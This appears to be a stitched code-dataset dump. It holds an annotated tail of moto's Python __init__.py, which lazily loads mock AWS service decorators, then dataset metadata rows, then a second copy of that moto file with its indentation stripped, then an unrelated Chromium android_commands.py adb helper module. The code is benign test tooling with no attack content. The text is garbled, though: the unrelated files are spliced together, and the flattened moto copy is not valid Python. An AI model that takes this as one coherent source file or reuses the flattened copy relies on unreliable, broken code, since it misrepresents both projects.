mock_guardduty = lazy_load(".guardduty", "mock_guardduty")
mock_iam = lazy_load(".iam", "mock_iam")
mock_iam_deprecated = lazy_load(".iam", "mock_iam_deprecated")
mock_iot = lazy_load(".iot", "mock_iot")
mock_iotdata = lazy_load(".iotdata", "mock_iotdata", boto3_name="iot-data")
mock_kinesis = lazy_load(".kinesis", "mock_kinesis")
mock_kinesis_deprecated = lazy_load(".kinesis", "mock_kinesis_deprecated")
mock_kms = lazy_load(".kms", "mock_kms")
mock_kms_deprecated = lazy_load(".kms", "mock_kms_deprecated")
mock_logs = lazy_load(".logs", "mock_logs")
mock_logs_deprecated = lazy_load(".logs", "mock_logs_deprecated")
mock_managedblockchain = lazy_load(".managedblockchain", "mock_managedblockchain")
mock_opsworks = lazy_load(".opsworks", "mock_opsworks")
mock_opsworks_deprecated = lazy_load(".opsworks", "mock_opsworks_deprecated")
mock_organizations = lazy_load(".organizations", "mock_organizations")
mock_polly = lazy_load(".polly", "mock_polly")
mock_ram = lazy_load(".ram", "mock_ram")
mock_rds = lazy_load(".rds", "mock_rds", warn_repurpose=True)
mock_rds_deprecated = lazy_load(".rds", "mock_rds_deprecated")
mock_rds2 = lazy_load(".rds2", "mock_rds2", boto3_name="rds")
mock_rds2_deprecated = lazy_load(".rds2", "mock_rds2_deprecated")
mock_redshift = lazy_load(".redshift", "mock_redshift")
mock_redshift_deprecated = lazy_load(".redshift", "mock_redshift_deprecated")
mock_resourcegroups = lazy_load(
    ".resourcegroups", "mock_resourcegroups", boto3_name="resource-groups"
)
mock_resourcegroupstaggingapi = lazy_load(
    ".resourcegroupstaggingapi", "mock_resourcegroupstaggingapi"
)
mock_route53 = lazy_load(".route53", "mock_route53")
mock_route53_deprecated = lazy_load(".route53", "mock_route53_deprecated")
mock_route53resolver = lazy_load(
    ".route53resolver", "mock_route53resolver", boto3_name="route53resolver"
)
mock_s3 = lazy_load(".s3", "mock_s3")
mock_s3_deprecated = lazy_load(".s3", "mock_s3_deprecated")
mock_sagemaker = lazy_load(".sagemaker", "mock_sagemaker")
mock_secretsmanager = lazy_load(".secretsmanager", "mock_secretsmanager")
mock_ses = lazy_load(".ses", "mock_ses")
mock_ses_deprecated = lazy_load(".ses", "mock_ses_deprecated")
mock_sns = lazy_load(".sns", "mock_sns")
mock_sns_deprecated = lazy_load(".sns", "mock_sns_deprecated")
mock_sqs = lazy_load(".sqs", "mock_sqs")
mock_sqs_deprecated = lazy_load(".sqs", "mock_sqs_deprecated")
mock_ssm = lazy_load(".ssm", "mock_ssm")
mock_stepfunctions = lazy_load(
    ".stepfunctions", "mock_stepfunctions", backend="stepfunction_backends"
)
mock_sts = lazy_load(".sts", "mock_sts")
mock_sts_deprecated = lazy_load(".sts", "mock_sts_deprecated")
mock_swf = lazy_load(".swf", "mock_swf")
mock_swf_deprecated = lazy_load(".swf", "mock_swf_deprecated")
mock_timestreamwrite = lazy_load(
    ".timestreamwrite", "mock_timestreamwrite", boto3_name="timestream-write"
)
mock_transcribe = lazy_load(".transcribe", "mock_transcribe")
# XRaySegment is a context manager rather than a mock decorator, but it is
# loaded through the same lazy mechanism.
XRaySegment = lazy_load(".xray", "XRaySegment")
mock_xray = lazy_load(".xray", "mock_xray")
mock_xray_client = lazy_load(".xray", "mock_xray_client")
mock_kinesisvideo = lazy_load(".kinesisvideo", "mock_kinesisvideo")
mock_kinesisvideoarchivedmedia = lazy_load(
    ".kinesisvideoarchivedmedia",
    "mock_kinesisvideoarchivedmedia",
    boto3_name="kinesis-video-archived-media",
)
mock_medialive = lazy_load(".medialive", "mock_medialive")
mock_support = lazy_load(".support", "mock_support")
mock_mediaconnect = lazy_load(".mediaconnect", "mock_mediaconnect")
mock_mediapackage = lazy_load(".mediapackage", "mock_mediapackage")
mock_mediastore = lazy_load(".mediastore", "mock_mediastore")
mock_eks = lazy_load(".eks", "mock_eks")
mock_mediastoredata = lazy_load(
    ".mediastoredata", "mock_mediastoredata", boto3_name="mediastore-data"
)
mock_efs = lazy_load(".efs", "mock_efs")
mock_wafv2 = lazy_load(".wafv2", "mock_wafv2")
mock_sdb = lazy_load(".sdb", "mock_sdb")
mock_elasticache = lazy_load(
    ".elasticache", "mock_elasticache", boto3_name="elasticache"
)
class MockAll(ContextDecorator):
    """Context manager / decorator that activates every service mock at once.

    On construction it scans the moto module for public ``mock_*`` decorators
    (skipping the deprecated boto(2) variants and ``mock_all`` itself) and
    instantiates each one; entering starts them all, exiting stops them all.
    """

    def __init__(self):
        self.mocks = [
            globals()[attr]()
            for attr in dir(sys.modules["moto"])
            if attr.startswith("mock_")
            and not attr.endswith("_deprecated")
            and attr != "mock_all"
        ]

    def __enter__(self):
        for active_mock in self.mocks:
            active_mock.start()

    def __exit__(self, *exc):
        for active_mock in self.mocks:
            active_mock.stop()
# Public alias: users write `with mock_all():` / `@mock_all()`.
mock_all = MockAll
# import logging
# logging.getLogger('boto').setLevel(logging.CRITICAL)
__title__ = "moto"
__version__ = "2.2.18.dev"
try:
    # Need to monkey-patch botocore requests back to underlying urllib3 classes
    from botocore.awsrequest import (
        HTTPSConnectionPool,
        HTTPConnectionPool,
        HTTPConnection,
        VerifiedHTTPSConnection,
    )
except ImportError:
    # botocore is optional at import time; without it there is nothing to patch.
    pass
else:
    HTTPSConnectionPool.ConnectionCls = VerifiedHTTPSConnection
    HTTPConnectionPool.ConnectionCls = HTTPConnection
| 43.671171
| 100
| 0.749252
|
import importlib
import sys
from contextlib import ContextDecorator
def lazy_load(
module_name, element, boto3_name=None, backend=None, warn_repurpose=False
):
def f(*args, **kwargs):
if warn_repurpose:
import warnings
warnings.warn(
f"Module {element} has been deprecated, and will be repurposed in a later release. "
"Please see https://github.com/spulec/moto/issues/4526 for more information."
)
module = importlib.import_module(module_name, "moto")
return getattr(module, element)(*args, **kwargs)
setattr(f, "name", module_name.replace(".", ""))
setattr(f, "element", element)
setattr(f, "boto3_name", boto3_name or f.name)
setattr(f, "backend", backend or f"{f.name}_backends")
return f
mock_acm = lazy_load(".acm", "mock_acm")
mock_apigateway = lazy_load(".apigateway", "mock_apigateway")
mock_apigateway_deprecated = lazy_load(".apigateway", "mock_apigateway_deprecated")
mock_athena = lazy_load(".athena", "mock_athena")
mock_applicationautoscaling = lazy_load(
".applicationautoscaling", "mock_applicationautoscaling"
)
mock_autoscaling = lazy_load(".autoscaling", "mock_autoscaling")
mock_autoscaling_deprecated = lazy_load(".autoscaling", "mock_autoscaling_deprecated")
mock_lambda = lazy_load(
".awslambda", "mock_lambda", boto3_name="lambda", backend="lambda_backends"
)
mock_lambda_deprecated = lazy_load(".awslambda", "mock_lambda_deprecated")
mock_batch = lazy_load(".batch", "mock_batch")
mock_budgets = lazy_load(".budgets", "mock_budgets")
mock_cloudformation = lazy_load(".cloudformation", "mock_cloudformation")
mock_cloudformation_deprecated = lazy_load(
".cloudformation", "mock_cloudformation_deprecated"
)
mock_cloudfront = lazy_load(".cloudfront", "mock_cloudfront")
mock_cloudtrail = lazy_load(".cloudtrail", "mock_cloudtrail", boto3_name="cloudtrail")
mock_cloudwatch = lazy_load(".cloudwatch", "mock_cloudwatch")
mock_cloudwatch_deprecated = lazy_load(".cloudwatch", "mock_cloudwatch_deprecated")
mock_codecommit = lazy_load(".codecommit", "mock_codecommit")
mock_codepipeline = lazy_load(".codepipeline", "mock_codepipeline")
mock_cognitoidentity = lazy_load(
".cognitoidentity", "mock_cognitoidentity", boto3_name="cognito-identity"
)
mock_cognitoidentity_deprecated = lazy_load(
".cognitoidentity", "mock_cognitoidentity_deprecated"
)
mock_cognitoidp = lazy_load(".cognitoidp", "mock_cognitoidp", boto3_name="cognito-idp")
mock_cognitoidp_deprecated = lazy_load(".cognitoidp", "mock_cognitoidp_deprecated")
mock_config = lazy_load(".config", "mock_config")
mock_datapipeline = lazy_load(".datapipeline", "mock_datapipeline")
mock_datapipeline_deprecated = lazy_load(
".datapipeline", "mock_datapipeline_deprecated"
)
mock_datasync = lazy_load(".datasync", "mock_datasync")
mock_dms = lazy_load(".dms", "mock_dms")
mock_ds = lazy_load(".ds", "mock_ds", boto3_name="ds")
mock_dynamodb = lazy_load(".dynamodb", "mock_dynamodb", warn_repurpose=True)
mock_dynamodb_deprecated = lazy_load(".dynamodb", "mock_dynamodb_deprecated")
mock_dynamodb2 = lazy_load(".dynamodb2", "mock_dynamodb2", backend="dynamodb_backends2")
mock_dynamodb2_deprecated = lazy_load(".dynamodb2", "mock_dynamodb2_deprecated")
mock_dynamodbstreams = lazy_load(".dynamodbstreams", "mock_dynamodbstreams")
mock_elasticbeanstalk = lazy_load(
".elasticbeanstalk", "mock_elasticbeanstalk", backend="eb_backends"
)
mock_ec2 = lazy_load(".ec2", "mock_ec2")
mock_ec2_deprecated = lazy_load(".ec2", "mock_ec2_deprecated")
mock_ec2instanceconnect = lazy_load(".ec2instanceconnect", "mock_ec2instanceconnect")
mock_ecr = lazy_load(".ecr", "mock_ecr")
mock_ecr_deprecated = lazy_load(".ecr", "mock_ecr_deprecated")
mock_ecs = lazy_load(".ecs", "mock_ecs")
mock_ecs_deprecated = lazy_load(".ecs", "mock_ecs_deprecated")
mock_elastictranscoder = lazy_load(".elastictranscoder", "mock_elastictranscoder")
mock_elb = lazy_load(".elb", "mock_elb")
mock_elb_deprecated = lazy_load(".elb", "mock_elb_deprecated")
mock_elbv2 = lazy_load(".elbv2", "mock_elbv2")
mock_emr = lazy_load(".emr", "mock_emr")
mock_emr_deprecated = lazy_load(".emr", "mock_emr_deprecated")
mock_emrcontainers = lazy_load(
".emrcontainers", "mock_emrcontainers", boto3_name="emr-containers"
)
mock_events = lazy_load(".events", "mock_events")
mock_firehose = lazy_load(".firehose", "mock_firehose")
mock_forecast = lazy_load(".forecast", "mock_forecast")
mock_glacier = lazy_load(".glacier", "mock_glacier")
mock_glacier_deprecated = lazy_load(".glacier", "mock_glacier_deprecated")
mock_glue = lazy_load(".glue", "mock_glue")
mock_guardduty = lazy_load(".guardduty", "mock_guardduty")
mock_iam = lazy_load(".iam", "mock_iam")
mock_iam_deprecated = lazy_load(".iam", "mock_iam_deprecated")
mock_iot = lazy_load(".iot", "mock_iot")
mock_iotdata = lazy_load(".iotdata", "mock_iotdata", boto3_name="iot-data")
mock_kinesis = lazy_load(".kinesis", "mock_kinesis")
mock_kinesis_deprecated = lazy_load(".kinesis", "mock_kinesis_deprecated")
mock_kms = lazy_load(".kms", "mock_kms")
mock_kms_deprecated = lazy_load(".kms", "mock_kms_deprecated")
mock_logs = lazy_load(".logs", "mock_logs")
mock_logs_deprecated = lazy_load(".logs", "mock_logs_deprecated")
mock_managedblockchain = lazy_load(".managedblockchain", "mock_managedblockchain")
mock_opsworks = lazy_load(".opsworks", "mock_opsworks")
mock_opsworks_deprecated = lazy_load(".opsworks", "mock_opsworks_deprecated")
mock_organizations = lazy_load(".organizations", "mock_organizations")
mock_polly = lazy_load(".polly", "mock_polly")
mock_ram = lazy_load(".ram", "mock_ram")
mock_rds = lazy_load(".rds", "mock_rds", warn_repurpose=True)
mock_rds_deprecated = lazy_load(".rds", "mock_rds_deprecated")
mock_rds2 = lazy_load(".rds2", "mock_rds2", boto3_name="rds")
mock_rds2_deprecated = lazy_load(".rds2", "mock_rds2_deprecated")
mock_redshift = lazy_load(".redshift", "mock_redshift")
mock_redshift_deprecated = lazy_load(".redshift", "mock_redshift_deprecated")
mock_resourcegroups = lazy_load(
".resourcegroups", "mock_resourcegroups", boto3_name="resource-groups"
)
mock_resourcegroupstaggingapi = lazy_load(
".resourcegroupstaggingapi", "mock_resourcegroupstaggingapi"
)
mock_route53 = lazy_load(".route53", "mock_route53")
mock_route53_deprecated = lazy_load(".route53", "mock_route53_deprecated")
mock_route53resolver = lazy_load(
".route53resolver", "mock_route53resolver", boto3_name="route53resolver"
)
mock_s3 = lazy_load(".s3", "mock_s3")
mock_s3_deprecated = lazy_load(".s3", "mock_s3_deprecated")
mock_sagemaker = lazy_load(".sagemaker", "mock_sagemaker")
mock_secretsmanager = lazy_load(".secretsmanager", "mock_secretsmanager")
mock_ses = lazy_load(".ses", "mock_ses")
mock_ses_deprecated = lazy_load(".ses", "mock_ses_deprecated")
mock_sns = lazy_load(".sns", "mock_sns")
mock_sns_deprecated = lazy_load(".sns", "mock_sns_deprecated")
mock_sqs = lazy_load(".sqs", "mock_sqs")
mock_sqs_deprecated = lazy_load(".sqs", "mock_sqs_deprecated")
mock_ssm = lazy_load(".ssm", "mock_ssm")
mock_stepfunctions = lazy_load(
".stepfunctions", "mock_stepfunctions", backend="stepfunction_backends"
)
mock_sts = lazy_load(".sts", "mock_sts")
mock_sts_deprecated = lazy_load(".sts", "mock_sts_deprecated")
mock_swf = lazy_load(".swf", "mock_swf")
mock_swf_deprecated = lazy_load(".swf", "mock_swf_deprecated")
mock_timestreamwrite = lazy_load(
".timestreamwrite", "mock_timestreamwrite", boto3_name="timestream-write"
)
mock_transcribe = lazy_load(".transcribe", "mock_transcribe")
XRaySegment = lazy_load(".xray", "XRaySegment")
mock_xray = lazy_load(".xray", "mock_xray")
mock_xray_client = lazy_load(".xray", "mock_xray_client")
mock_kinesisvideo = lazy_load(".kinesisvideo", "mock_kinesisvideo")
mock_kinesisvideoarchivedmedia = lazy_load(
".kinesisvideoarchivedmedia",
"mock_kinesisvideoarchivedmedia",
boto3_name="kinesis-video-archived-media",
)
mock_medialive = lazy_load(".medialive", "mock_medialive")
mock_support = lazy_load(".support", "mock_support")
mock_mediaconnect = lazy_load(".mediaconnect", "mock_mediaconnect")
mock_mediapackage = lazy_load(".mediapackage", "mock_mediapackage")
mock_mediastore = lazy_load(".mediastore", "mock_mediastore")
mock_eks = lazy_load(".eks", "mock_eks")
mock_mediastoredata = lazy_load(
".mediastoredata", "mock_mediastoredata", boto3_name="mediastore-data"
)
mock_efs = lazy_load(".efs", "mock_efs")
mock_wafv2 = lazy_load(".wafv2", "mock_wafv2")
mock_sdb = lazy_load(".sdb", "mock_sdb")
mock_elasticache = lazy_load(
".elasticache", "mock_elasticache", boto3_name="elasticache"
)
class MockAll(ContextDecorator):
def __init__(self):
self.mocks = []
for mock in dir(sys.modules["moto"]):
if (
mock.startswith("mock_")
and not mock.endswith("_deprecated")
and not mock == ("mock_all")
):
self.mocks.append(globals()[mock]())
def __enter__(self):
for mock in self.mocks:
mock.start()
def __exit__(self, *exc):
for mock in self.mocks:
mock.stop()
mock_all = MockAll
__title__ = "moto"
__version__ = "2.2.18.dev"
try:
from botocore.awsrequest import (
HTTPSConnectionPool,
HTTPConnectionPool,
HTTPConnection,
VerifiedHTTPSConnection,
)
except ImportError:
pass
else:
HTTPSConnectionPool.ConnectionCls = VerifiedHTTPSConnection
HTTPConnectionPool.ConnectionCls = HTTPConnection
| true
| true
|
f7191f7935da25cbd12b4c11447277fbf7e9bc34
| 73,117
|
py
|
Python
|
build/android/pylib/android_commands.py
|
gw280/buildroot
|
85c55625fd2cdd92e756b2b845ed054f7bd19130
|
[
"BSD-3-Clause"
] | 20
|
2015-08-26T06:46:00.000Z
|
2019-02-27T09:05:58.000Z
|
build/android/pylib/android_commands.py
|
gw280/buildroot
|
85c55625fd2cdd92e756b2b845ed054f7bd19130
|
[
"BSD-3-Clause"
] | 3
|
2019-01-02T17:06:03.000Z
|
2019-01-16T23:55:04.000Z
|
build/android/pylib/android_commands.py
|
gw280/buildroot
|
85c55625fd2cdd92e756b2b845ed054f7bd19130
|
[
"BSD-3-Clause"
] | 2
|
2015-08-26T05:49:35.000Z
|
2020-02-03T20:22:43.000Z
|
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Provides an interface to communicate with the device via the adb command.
Assumes adb binary is currently on system path.
Note that this module is deprecated.
"""
# TODO(jbudorick): Delete this file once no clients use it.
# pylint: skip-file
import collections
import datetime
import inspect
import logging
import os
import random
import re
import shlex
import signal
import subprocess
import sys
import tempfile
import time
import cmd_helper
import constants
import system_properties
from utils import host_utils
try:
from pylib import pexpect
except ImportError:
pexpect = None
sys.path.append(os.path.join(
constants.DIR_SOURCE_ROOT, 'third_party', 'android_testrunner'))
import adb_interface
import am_instrument_parser
import errors
from pylib.device import device_blacklist
from pylib.device import device_errors
# Pattern to search for the next whole line of pexpect output and capture it
# into a match group. We can't use ^ and $ for line start end with pexpect,
# see http://www.noah.org/python/pexpect/#doc for explanation why.
PEXPECT_LINE_RE = re.compile('\n([^\r]*)\r')
# Set the adb shell prompt to be a unique marker that will [hopefully] not
# appear at the start of any line of a command's output.
SHELL_PROMPT = '~+~PQ\x17RS~+~'
# Java properties file
LOCAL_PROPERTIES_PATH = constants.DEVICE_LOCAL_PROPERTIES_PATH
# Property in /data/local.prop that controls Java assertions.
JAVA_ASSERT_PROPERTY = 'dalvik.vm.enableassertions'
# Keycode "enum" suitable for passing to AndroidCommands.SendKey().
KEYCODE_HOME = 3
KEYCODE_BACK = 4
KEYCODE_DPAD_UP = 19
KEYCODE_DPAD_DOWN = 20
KEYCODE_DPAD_RIGHT = 22
KEYCODE_ENTER = 66
KEYCODE_MENU = 82
# On-device locations (under the test executable dir) of the md5sum helper
# binary and the run_pie wrapper.
MD5SUM_DEVICE_FOLDER = constants.TEST_EXECUTABLE_DIR + '/md5sum/'
MD5SUM_DEVICE_PATH = MD5SUM_DEVICE_FOLDER + 'md5sum_bin'
PIE_WRAPPER_PATH = constants.TEST_EXECUTABLE_DIR + '/run_pie'
# Per-model recipes for toggling USB charging. Each entry pairs a
# 'witness_file' (presumably checked to identify the model — confirm in the
# code that consumes this table) with shell commands to enable/disable
# charging over USB.
CONTROL_USB_CHARGING_COMMANDS = [
  {
    # Nexus 4
    'witness_file': '/sys/module/pm8921_charger/parameters/disabled',
    'enable_command': 'echo 0 > /sys/module/pm8921_charger/parameters/disabled',
    'disable_command':
        'echo 1 > /sys/module/pm8921_charger/parameters/disabled',
  },
  {
    # Nexus 5
    # Setting the HIZ bit of the bq24192 causes the charger to actually ignore
    # energy coming from USB. Setting the power_supply offline just updates the
    # Android system to reflect that.
    'witness_file': '/sys/kernel/debug/bq24192/INPUT_SRC_CONT',
    'enable_command': (
        'echo 0x4A > /sys/kernel/debug/bq24192/INPUT_SRC_CONT && '
        'echo 1 > /sys/class/power_supply/usb/online'),
    'disable_command': (
        'echo 0xCA > /sys/kernel/debug/bq24192/INPUT_SRC_CONT && '
        'chmod 644 /sys/class/power_supply/usb/online && '
        'echo 0 > /sys/class/power_supply/usb/online'),
  },
]
class DeviceTempFile(object):
  """A temporary file path on the device's external storage.

  Usable as a context manager; the backing file is removed from the device
  when close() is called (or the with-block exits).
  """

  def __init__(self, android_commands, prefix='temp_file', suffix=''):
    """Find an unused temporary file path in the devices external directory.

    When this object is closed, the file will be deleted on the device.
    """
    self.android_commands = android_commands
    while True:
      # A random component plus the existence check below makes collisions
      # unlikely, though two callers could still race if neither writes the
      # file promptly.
      token = random.randint(0, 1000000)
      self.name = '%s/%s-%d-%010d%s' % (
          android_commands.GetExternalStorage(),
          prefix, int(time.time()), token, suffix)
      if not android_commands.FileExistsOnDevice(self.name):
        break

  def __enter__(self):
    return self

  def __exit__(self, type, value, traceback):
    self.close()

  def close(self):
    """Delete the backing file on the device."""
    self.android_commands.RunShellCommand('rm ' + self.name)
def GetAVDs():
  """Returns the names of all AVDs known to the local `android` tool."""
  listing = cmd_helper.GetCmdOutput(['android', 'list', 'avd'])
  name_re = re.compile('^[ ]+Name: ([a-zA-Z0-9_:.-]+)', re.MULTILINE)
  return name_re.findall(listing)
def ResetBadDevices():
  """Clears the per-build blacklist of known-bad devices."""
  device_blacklist.ResetBlacklist()
def ExtendBadDevices(devices):
  """Records |devices| as bad for the current build.

  Blacklisted devices are subsequently excluded from GetAttachedDevices().

  Args:
    devices: list of bad devices to be added to the bad devices file.
  """
  device_blacklist.ExtendBlacklist(devices)
def GetAttachedDevices(hardware=True, emulator=True, offline=False):
  """Returns a list of attached, android devices and emulators.

  If a preferred device has been set with ANDROID_SERIAL, it will be first in
  the returned list. The arguments specify what devices to include in the list.

  Args:
    hardware: Include attached actual devices that are online.
    emulator: Include emulators (i.e. AVD's) currently on host.
    offline: Include devices and emulators that are offline.

  Returns: List of device serials.
  """
  adb_output = cmd_helper.GetCmdOutput([constants.GetAdbPath(), 'devices'])
  online_devices = re.findall('^([a-zA-Z0-9_:.-]+)\tdevice$', adb_output,
                              re.MULTILINE)
  emulator_devices = re.findall('^(emulator-[0-9]+)\tdevice', adb_output,
                                re.MULTILINE)
  offline_devices = re.findall('^([a-zA-Z0-9_:.-]+)\t(?:offline|unauthorized)$',
                               adb_output, re.MULTILINE)

  # Pick the online population the caller asked for.
  if hardware and emulator:
    devices = list(online_devices)
  elif hardware:
    devices = [d for d in online_devices if d not in emulator_devices]
  elif emulator:
    devices = list(emulator_devices)
  else:
    devices = []

  if offline:
    devices = devices + offline_devices

  # Drop anything the per-build blacklist has flagged as bad.
  blacklist = device_blacklist.ReadBlacklist()
  if len(blacklist):
    logging.info('Avoiding bad devices %s', ' '.join(blacklist))
    devices = [d for d in devices if d not in blacklist]

  # ANDROID_SERIAL names the preferred device; move it to the front.
  preferred_device = os.environ.get('ANDROID_SERIAL')
  if preferred_device in devices:
    devices.remove(preferred_device)
    devices.insert(0, preferred_device)
  return devices
def IsDeviceAttached(device):
  """Returns True iff |device| currently shows up as attached and online."""
  return device in GetAttachedDevices()
def _GetFilesFromRecursiveLsOutput(path, ls_output, re_file, utc_offset=None):
  """Gets a list of files from `ls` command output.

  Python's os.walk isn't used because it doesn't work over adb shell.

  Args:
    path: The path to list.
    ls_output: A list of lines returned by an `ls -lR` command.
    re_file: A compiled regular expression which parses a line into named groups
        consisting of at minimum "filename", "date", "time", "size" and
        optionally "timezone".
    utc_offset: A 5-character string of the form +HHMM or -HHMM, where HH is a
        2-digit string giving the number of UTC offset hours, and MM is a
        2-digit string giving the number of UTC offset minutes. If the input
        utc_offset is None, will try to look for the value of "timezone" if it
        is specified in re_file.

  Returns:
    A dict of {"name": (size, lastmod), ...} where:
      name: The file name relative to |path|'s directory.
      size: The file size in bytes (0 for directories).
      lastmod: The file last modification date in UTC.
  """
  # `ls -lR` prints a "<dir>:" header before each directory's entries; track
  # the current directory so file names can be joined onto it.
  re_directory = re.compile('^%s/(?P<dir>[^:]+):$' % re.escape(path))
  path_dir = os.path.dirname(path)
  current_dir = ''
  files = {}
  for line in ls_output:
    directory_match = re_directory.match(line)
    if directory_match:
      current_dir = directory_match.group('dir')
      continue
    file_match = re_file.match(line)
    if file_match:
      filename = os.path.join(current_dir, file_match.group('filename'))
      # Strip the listing root's parent so names are relative to it.
      if filename.startswith(path_dir):
        filename = filename[len(path_dir) + 1:]
      # Only HH:MM is kept — [:5] drops any trailing seconds some ls
      # variants append.
      lastmod = datetime.datetime.strptime(
          file_match.group('date') + ' ' + file_match.group('time')[:5],
          '%Y-%m-%d %H:%M')
      if not utc_offset and 'timezone' in re_file.groupindex:
        utc_offset = file_match.group('timezone')
      # Normalize the local timestamp to UTC when an offset is known.
      if isinstance(utc_offset, str) and len(utc_offset) == 5:
        utc_delta = datetime.timedelta(hours=int(utc_offset[1:3]),
                                       minutes=int(utc_offset[3:5]))
        if utc_offset[0:1] == '-':
          utc_delta = -utc_delta
        lastmod -= utc_delta
      files[filename] = (int(file_match.group('size')), lastmod)
  return files
def _ParseMd5SumOutput(md5sum_output):
  """Returns a list of tuples from the provided md5sum output.

  Args:
    md5sum_output: output directly from md5sum binary.

  Returns:
    List of namedtuples with attributes |hash| and |path|, where |path| is the
    absolute path to the file with an Md5Sum of |hash|.
  """
  HashAndPath = collections.namedtuple('HashAndPath', ['hash', 'path'])
  split_lines = [line.split('  ') for line in md5sum_output]
  # Lines that don't split into exactly (hash, path) — blank lines, error
  # text — are silently dropped.
  return [HashAndPath._make(s) for s in split_lines if len(s) == 2]
def _HasAdbPushSucceeded(command_output):
  """Returns whether adb push has succeeded from the provided output."""
  # TODO(frankf): We should look at the return code instead of the command
  # output for many of the commands in this file.
  if not command_output:
    return True
  # Success ends with e.g. "3035 KB/s (12512056 bytes in 4.025s)"; failures
  # read "failed to copy ...". A leading digit on the last line means success.
  last_line = command_output.splitlines()[-1]
  if re.search('^[0-9]', last_line):
    return True
  logging.critical('PUSH FAILED: ' + command_output)
  return False
def GetLogTimestamp(log_line, year):
  """Returns the timestamp of the given |log_line| in the given year.

  Logcat lines carry no year, so |year| is prepended before parsing. Returns
  None (after logging) when the line does not start with a timestamp.
  """
  stamped = '%s-%s' % (year, log_line[:18])
  try:
    return datetime.datetime.strptime(stamped, '%Y-%m-%d %H:%M:%S.%f')
  except (ValueError, IndexError):
    logging.critical('Error reading timestamp from ' + log_line)
    return None
class AndroidCommands(object):
"""Helper class for communicating with Android device via adb."""
  def __init__(self, device=None):
    """Constructor.

    Args:
      device: If given, adb commands are only send to the device of this ID.
          Otherwise commands are sent to all attached devices.
    """
    self._adb = adb_interface.AdbInterface(constants.GetAdbPath())
    if device:
      self._adb.SetTargetSerial(device)
    self._device = device
    # Logcat monitoring state (managed by logcat methods elsewhere in file).
    self._logcat = None
    self.logcat_process = None
    self._logcat_tmpoutfile = None
    # Device paths pushed via PushIfNeeded(); removed by RemovePushedFiles().
    self._pushed_files = []
    self._device_utc_offset = None  # lazily populated by GetUtcOffset()
    # Byte counters maintained by PushIfNeeded(), reported by GetPushSizeInfo().
    self._potential_push_size = 0
    self._actual_push_size = 0
    self._external_storage = ''  # lazily populated by GetExternalStorage()
    self._util_wrapper = ''
    self._system_properties = system_properties.SystemProperties(self.Adb())
    # host path -> mtime of last successful push; see PushIfNeeded()/_RunMd5Sum.
    self._push_if_needed_cache = {}
    self._control_usb_charging_command = {
        'command': None,
        'cached': False,
    }
    # None means "not probed yet"; see _GetProtectedFileCommandRunner().
    self._protected_file_access_method_initialized = None
    self._privileged_command_runner = None
    self._pie_wrapper = None  # set on first GetAndroidToolStatusAndOutput()
  @property
  def system_properties(self):
    """SystemProperties accessor for the device (getprop/setprop wrapper)."""
    return self._system_properties
def _LogShell(self, cmd):
"""Logs the adb shell command."""
if self._device:
device_repr = self._device[-4:]
else:
device_repr = '????'
logging.info('[%s]> %s', device_repr, cmd)
  def Adb(self):
    """Returns our AdbInterface to avoid us wrapping all its methods."""
    # TODO(tonyg): Goal should be to get rid of this method by making this API
    # complete and alleviating the need.
    return self._adb
  def GetDevice(self):
    """Returns the device serial."""
    # May be None when this instance broadcasts to all attached devices.
    return self._device
  def IsOnline(self):
    """Checks whether the device is online.

    Returns:
      True if device is in 'device' mode, False otherwise.
    """
    # TODO(aurimas): revert to using adb get-state when android L adb is fixed.
    #out = self._adb.SendCommand('get-state')
    #return out.strip() == 'device'
    # Workaround: scan 'adb devices' output for a line containing both our
    # serial and the 'device' state token.
    out = self._adb.SendCommand('devices')
    for line in out.split('\n'):
      if self._device in line and 'device' in line:
        return True
    return False
def IsRootEnabled(self):
"""Checks if root is enabled on the device."""
root_test_output = self.RunShellCommand('ls /root') or ['']
return not 'Permission denied' in root_test_output[0]
  def EnableAdbRoot(self):
    """Enables adb root on the device.

    Returns:
      True: if output from executing adb root was as expected.
      False: otherwise.
    """
    # 'user' (production) builds do not allow adbd to restart as root.
    if self.GetBuildType() == 'user':
      logging.warning("Can't enable root in production builds with type user")
      return False
    else:
      return_value = self._adb.EnableAdbRoot()
      # EnableAdbRoot inserts a call for wait-for-device only when adb logcat
      # output matches what is expected. Just to be safe add a call to
      # wait-for-device.
      self._adb.SendCommand('wait-for-device')
      return return_value
  def GetDeviceYear(self):
    """Returns the year information of the date on device."""
    # Returned as a string, e.g. '2014' (first output line of `date +%Y`).
    return self.RunShellCommand('date +%Y')[0]
  def GetExternalStorage(self):
    """Returns the device's $EXTERNAL_STORAGE path (e.g. '/sdcard'), cached.

    Raises:
      device_errors.CommandFailedError: if $EXTERNAL_STORAGE is unset/empty.
    """
    if not self._external_storage:
      self._external_storage = self.RunShellCommand('echo $EXTERNAL_STORAGE')[0]
      if not self._external_storage:
        raise device_errors.CommandFailedError(
            ['shell', "'echo $EXTERNAL_STORAGE'"],
            'Unable to find $EXTERNAL_STORAGE')
    return self._external_storage
  def WaitForDevicePm(self, timeout=120):
    """Blocks until the device's package manager is available.

    To workaround http://b/5201039, we restart the shell and retry if the
    package manager isn't back after 120 seconds.

    Args:
      timeout: seconds to wait per attempt (3 attempts total).

    Raises:
      errors.WaitForResponseTimedOutError after max retries reached.
    """
    last_err = None
    retries = 3
    while retries:
      try:
        self._adb.WaitForDevicePm(wait_time=timeout)
        return  # Success
      except errors.WaitForResponseTimedOutError as e:
        last_err = e
        logging.warning('Restarting and retrying after timeout: %s', e)
        retries -= 1
        self.RestartShell()
    raise last_err # Only reached after max retries, re-raise the last error.
def RestartShell(self):
"""Restarts the shell on the device. Does not block for it to return."""
self.RunShellCommand('stop')
self.RunShellCommand('start')
  def Reboot(self, full_reboot=True):
    """Reboots the device and waits for the package manager to return.

    Args:
      full_reboot: Whether to fully reboot the device or just restart the shell.
    """
    # TODO(torne): hive can't reboot the device either way without breaking the
    # connection; work out if we can handle this better
    if os.environ.get('USING_HIVE'):
      logging.warning('Ignoring reboot request as we are on hive')
      return
    if full_reboot or not self.IsRootEnabled():
      self._adb.SendCommand('reboot')
      # Cached properties are stale after a real reboot; rebuild the wrapper.
      self._system_properties = system_properties.SystemProperties(self.Adb())
      timeout = 300
      retries = 1
      # Wait for the device to disappear.
      while retries < 10 and self.IsOnline():
        time.sleep(1)
        retries += 1
    else:
      self.RestartShell()
      timeout = 120
    # To run tests we need at least the package manager and the sd card (or
    # other external storage) to be ready.
    self.WaitForDevicePm(timeout)
    self.WaitForSdCardReady(timeout)
